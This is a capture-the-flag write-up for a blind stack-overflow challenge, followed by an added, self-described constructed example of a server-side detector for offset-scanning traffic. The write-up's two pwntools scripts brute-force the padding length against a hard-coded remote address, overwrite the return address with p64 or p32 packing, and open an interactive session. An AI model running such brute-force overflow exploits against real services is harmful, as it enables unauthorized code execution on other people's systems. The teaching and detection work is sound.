Challenge description
This kind of challenge is interesting: only the target address is given, with no binary, so you have to work blind, much like blind SQL injection on the web.
Connect with nc to the given target address; the idea is:
use the stack overflow to overwrite the return address and return to a chosen address. The exact overflow offset is unknown, and whether the address has to be packed with p64() or p32() is also unknown, so write an EXP and try offsets one by one.
from pwn import *

b = 0x40060d  # address to return to

# Try padding lengths one by one until the return address is overwritten
for i in range(100):
    print(i)
    p = remote('111.200.241.244', 49684)
    payload = b'a' * i + p64(b)  # switch to p32(b) if p64 gives nothing
    p.recvuntil(b">")
    p.sendline(payload)
    p.interactive()
Get the flag; if p64() gives nothing, change it to p32() and try again. You can also narrow the range of i to a sensible interval to save time.
Here is another EXP, a little more complicated than mine, but it needs only one run because it tries both p32() and p64() for every offset:
from pwn import *

b = 0x40060d  # address to return to

def fuzz(p, i, j):
    # i = padding length, j selects the packing width (1 = p32, 2 = p64)
    payload = b'a' * i
    if j == 1:
        payload += p32(b)
    if j == 2:
        payload += p64(b)
    p.recvuntil(b">")
    p.sendline(payload)

def main():
    for i in range(100):
        print(i)
        for j in range(1, 3):
            p = None
            try:
                p = remote('111.200.241.244', 45566)
                fuzz(p, i, j)
                print(p.recv())
                p.interactive()
            except Exception:
                # connection dropped (wrong offset or width): close and try the next one
                if p is not None:
                    p.close()

main()
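As an added example that is not part of the original writeup, here is the server-side view of what both EXPs above produce: one client opening many connections, each sending a longer run of filler bytes that ends in the same packed p32/p64 address. The log format (one line of "source_ip hex_payload") and the sample lines are constructed for this example.

```python
import struct
from collections import defaultdict

# Constructed sample log: five scan attempts from one client with growing
# filler and the same 8-byte address, plus one benign line. Format assumed
# for this example: "<src_ip> <hex payload>" per line.
TARGET = 0x40060d
SAMPLE_LOG = [f"10.0.0.5 {(b'a' * i + struct.pack('<Q', TARGET)).hex()}"
              for i in (3, 4, 5, 6, 7)]
SAMPLE_LOG.append("10.0.0.9 " + b"hello\n".hex())  # benign client

def trailing_address(payload: bytes):
    """Return (padding_len, addr) if payload looks like a single repeated
    filler byte followed by a p64 or p32 packed value, else None.
    Heuristic: the packed value must not start with the filler byte."""
    for width, fmt in ((8, "<Q"), (4, "<I")):
        if len(payload) <= width:
            continue
        pad, tail = payload[:-width], payload[-width:]
        if len(set(pad)) == 1 and tail[0] != pad[0]:
            return len(pad), struct.unpack(fmt, tail)[0]
    return None

def find_offset_scans(lines, min_attempts=4):
    """Flag sources that repeatedly send strictly growing filler ending in
    the same address: the signature of a blind offset brute force."""
    seen = defaultdict(list)  # (src, addr) -> padding lengths observed
    for line in lines:
        src, hexpayload = line.split(" ", 1)
        hit = trailing_address(bytes.fromhex(hexpayload))
        if hit:
            seen[(src, hit[1])].append(hit[0])
    alerts = {}
    for (src, addr), pads in seen.items():
        growing = pads == sorted(pads) and len(set(pads)) == len(pads)
        if len(pads) >= min_attempts and growing:
            alerts[src] = (hex(addr), len(pads))
    return alerts

if __name__ == "__main__":
    print(find_offset_scans(SAMPLE_LOG))  # {'10.0.0.5': ('0x40060d', 5)}
```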